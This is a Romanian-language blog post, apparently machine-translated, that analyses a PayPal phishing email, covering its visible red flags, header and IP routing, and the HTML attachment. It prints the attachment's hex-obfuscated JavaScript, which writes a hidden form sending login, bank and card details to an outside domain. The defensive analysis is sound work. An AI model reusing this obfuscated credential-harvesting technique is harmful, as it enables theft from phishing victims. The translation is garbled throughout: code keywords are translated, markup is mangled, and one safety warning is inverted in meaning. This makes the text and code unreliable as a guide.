10Sep
În lumea de astăzi, unde informația fiecăruia este online, phishingul este unul dintre cele mai populare atacuri online și devastatoare, pentru că puteți curăța întotdeauna un virus, dar dacă detaliile dvs. bancare sunt furate, aveți probleme. Iată o defalcare a unui astfel de atac pe care l-am primit.
Nu credeți că sunt doar detaliile dvs. bancare importante: la urma urmei, dacă cineva obține controlul asupra contului dvs. de conectare, nu numai că cunoaște informațiile conținute în acel cont, ci șansele sunt că aceleași informații de conectare pot fi utilizate pe diversealte conturi.Și dacă vă compromite contul de e-mail, aceștia vă pot reseta toate celelalte parole.
Deci, pe lângă păstrarea parolelor puternice și variate, trebuie să fii mereu în căutarea unor email-uri false care se comportă ca un lucru real.În timp ce cele mai multe încercări de phishing sunt amateurice, unele sunt destul de convingătoare, așa că este important să înțelegem cum să le recunoaștem la nivel de suprafață, precum și cum funcționează sub capota.
Imagine de asirap
Examining Ce este în viziunea simplă
Exemplul nostru de e-mail, la fel ca cele mai multe încercări de phishing, "vă anunță" de activitate în contul dvs. PayPal, care ar fi, în condiții normale, alarmantă.Deci, apelul la acțiune este să verifici / să-ți restabilești contul, trimițând aproape orice informație personală despre care te poți gândi. Din nou, acest lucru este destul de formic.
Deși există cu siguranță excepții, aproape toate e-mailurile de phishing și înșelătorie sunt încărcate cu steaguri roșii direct în mesaj. Chiar dacă textul este convingător, puteți găsi, de obicei, multe greșeli umflate în tot corpul mesajului, care indică faptul că mesajul nu este legitim.
Corpul de mesaje
La prima vedere, acesta este unul dintre cele mai bune e-mailuri de phishing pe care le-am văzut. Nu există greșeli de ortografie sau gramatică, iar verbiageul citește în funcție de ceea ce vă puteți aștepta. Cu toate acestea, există câteva steaguri roșii pe care le puteți vedea atunci când examinați conținutul un pic mai îndeaproape.
- "Paypal" - Cazul corect este "PayPal"( capital P).Puteți vedea că ambele variante sunt utilizate în mesaj. Companiile sunt foarte deliberate cu branding-ul lor, deci este îndoielnic că așa ceva ar trece procesul de verificare.
- "permite ActiveX" - De câte ori ați văzut o afacere legitimă pe web dimensiunea Paypal utilizează o componentă de proprietate care funcționează numai pe un singur browser, mai ales când suportă mai multe browsere? Sigur, undeva acolo o face o companie, dar acesta este un steag roșu.
- "în siguranță". - Observați cum acest cuvânt nu se aliniază în margine cu restul textului paragrafului. Chiar dacă aș întinde fereastra un pic mai mult, nu se înfășoară sau spațiul corect.
- "Paypal!" - Spațiul din fața semnului de exclamare pare ciudat. Doar o altă întrebare pe care eu sunt sigur că nu ar fi într-un e-mail legit.
- "PayPal- Formularul de actualizare a contului.pdf.htm" - De ce ar fi Paypal atașat un "PDF" mai ales atunci când ar putea să se lege doar la o pagină de pe site-ul lor?În plus, de ce ar încerca să ascundă un fișier HTML ca un PDF?Acesta este cel mai mare steag roșu al tuturor.
Antetul mesajului
Când aruncați o privire la antetul mesajului, apar două indicatoare roșii:
- Adresa de la adresa [email protected].
- Lipsește adresa. Nu am renunțat la asta, pur și simplu nu face parte din antetul mesajului standard. De obicei, o companie cu numele dvs. vă va personaliza adresa de e-mail.
Atasamentul
Când deschid atașamentul, puteți vedea imediat că aspectul nu este corect deoarece lipsesc informațiile despre stil. Din nou, de ce ar fi trimis PayPal un formular HTML atunci când acestea ar putea pur și simplu să vă dea un link pe site-ul lor?
Notă: am folosit vizualizatorul de atașamente HTML al lui Gmail încorporat pentru acest lucru, dar vă recomandăm să nu dezactivați atașamentele de la escrocii. Nu. Vreodată.Acestea conțin foarte multe exploitări care vor instala troieni pe PC-ul dvs. pentru a vă fura informațiile despre cont.
Deplasând puțin mai mult, puteți observa că acest formular solicită nu numai informațiile noastre de conectare PayPal, ci și informațiile bancare și cărțile de credit. Unele imagini sunt rupte.
Este evident că această încercare de phishing se întâmplă după totul cu o singură lovitură.
Defalcarea tehnică
Deși ar trebui să fie destul de clar pe baza a ceea ce este clar că aceasta este o încercare de phishing, acum vom descompune machiajul tehnic al e-mailului și vom vedea ce putem găsi.
Informații din atașament
Primul lucru de analizat este sursa HTML a formularului de atașament, ceea ce transmite datele către site-ul fals.
Atunci când vizualizați rapid sursa, toate link-urile apar valide, deoarece indică fie "paypal.com", fie "paypalobjects.com" care sunt ambele legit.
Acum vom arunca o privire asupra unor informații de bază pe care Firefox le adună pe pagină.
După cum puteți vedea, unele dintre grafice sunt extrase din domeniile "blessedtobe.com", "goodhealthpharmacy.com" și "pic-upload.de" în locul domeniilor legale PayPal.
Informații de la anteturile de e-mail
Apoi vom arunca o privire la anteturile de e-mail brute. Gmail face acest lucru disponibil prin opțiunea de meniu Afișare original din mesaj.
Privind informațiile antetului pentru mesajul original, puteți vedea că acest mesaj a fost compus folosind Outlook Express 6. Îndoiesc că PayPal are pe cineva din personal care trimite fiecare dintre aceste mesaje manual printr-un client de e-mail învechit.
Privind acum la informațiile despre rutare, putem vedea adresa IP a serverului de expeditor și a serverului de retransmisie.
Adresa IP "Utilizator" este expeditor original. Făcând o căutare rapidă a informațiilor despre IP, putem vedea că IP-ul de expediere se află în Germania.
Și când ne uităm la adresa de e-mail a serverului de trimitere( mail.itak.at), adresa IP, putem vedea că acesta este un ISP cu sediul în Austria. Mă îndoiesc că PayPal își redirecționează e-mailurile direct prin intermediul unui furnizor ISP din Austria, atunci când are o fermă de servere masivă care ar putea face față cu ușurință acestei sarcini.
Unde merge datele?
Așadar, am stabilit în mod clar că acesta este un e-mail de phishing și a adunat câteva informații despre locul unde a provenit mesajul, dar despre ce date sunt trimise datele dvs.?
Pentru a vedea acest lucru, trebuie mai întâi să salvăm atașamentul HTM pe desktopul nostru și să îl deschidem într-un editor de text. Trecând prin ea, totul pare a fi în ordine, cu excepția cazului în care ajungem la un blocaj Javascript suspect.
Descărcând sursa completă a ultimului bloc de Javascript, vedem:
& lt; script language = "JavaScript" type = "text / javascript" & gt;
// Copyright © 2005 Voormedia - WWW.VOORMEDIA.COM
var i, y, x =“3c666f726d206e616d653d226d61696e222069643d226d61696e22206d6574686f643d22706f73742220616374696f6e3d22687474703a2f2f7777772e646578706f737572652e6e65742f6262732f646174612f7665726966792e706870223e“ y =“pentru( i = 0; i & lt; x.length; i + = 2){ y + = unescape( '%' + x.substr( i, 2));} document.write( y);
& lt; / script & gt;
Ori de câte ori vedeți un șir mare de litere aparent aleatoare și numere încorporate într-un bloc Javascript, este de obicei ceva suspect. Privind codul, variabila "x" este setată la acest șir mare și apoi decodificată în variabila "y".Rezultatul final al variabilei "y" este apoi scris în document ca HTML.
Deoarece șirul mare este format din numere 0-9 și literele AF, acesta este cel mai probabil codificat printr-un simplu ASCII de conversie Hex:
3c666f726d206e616d653d226d61696e222069643d226d61696e22206d6574686f643d22706f73742220616374696f6e3d22687474703a2f2f7777772e646578706f737572652e6e65742f6262732f646174612f7665726966792e706870223e
Se transformă în:
& lt; form name = id“principal“ =“principal“method = "post" acțiune = "http: //www.dexposure.net/bbs/data/ verify.php" & gt;
Nu este o coincidență faptul că aceasta se decodifică într-o etichetă validă de formular HTML care trimite rezultatele nu către PayPal, ci către un site necinstit.
În plus, când vizualizați sursa HTML a formularului, veți vedea că această etichetă de formular nu este vizibilă deoarece este generată în mod dinamic prin Javascript. Acesta este un mod inteligent de a ascunde ceea ce face de fapt HTML dacă cineva ar vedea pur și simplu sursa generată de atașament( așa cum am făcut mai devreme), spre deosebire de deschiderea atașamentului direct într-un editor de text.
Făcând un Whois rapid pe site-ul ofensator, putem vedea că acesta este un domeniu găzduit de o gazdă web populară, 1and1.
Ceea ce se remarcă este că domeniul utilizează un nume lizibil( spre deosebire de ceva de genul "dfh3sjhskjhw.net"), iar domeniul a fost înregistrat timp de 4 ani. Din acest motiv, cred că acest domeniu a fost deturnat și folosit ca pion în această încercare de phishing.
Cynicismul este o apărare bună
Când vine vorba de a rămâne în siguranță online, nu doare niciodată să aibă un pic de cinism.
În timp ce sunt sigur că există mai multe steaguri roșii în exemplul de e-mail, ceea ce am subliniat mai sus sunt indicatori pe care i-am văzut după doar câteva minute de examinare. Din punct de vedere ipotetic, dacă nivelul de suprafață al e-mailului și-a imitat 100% omologul său legitim, analiza tehnică ar dezvălui în continuare adevărata sa natură.Acesta este motivul pentru care este importat să puteți examina atât ce puteți și ce nu puteți vedea.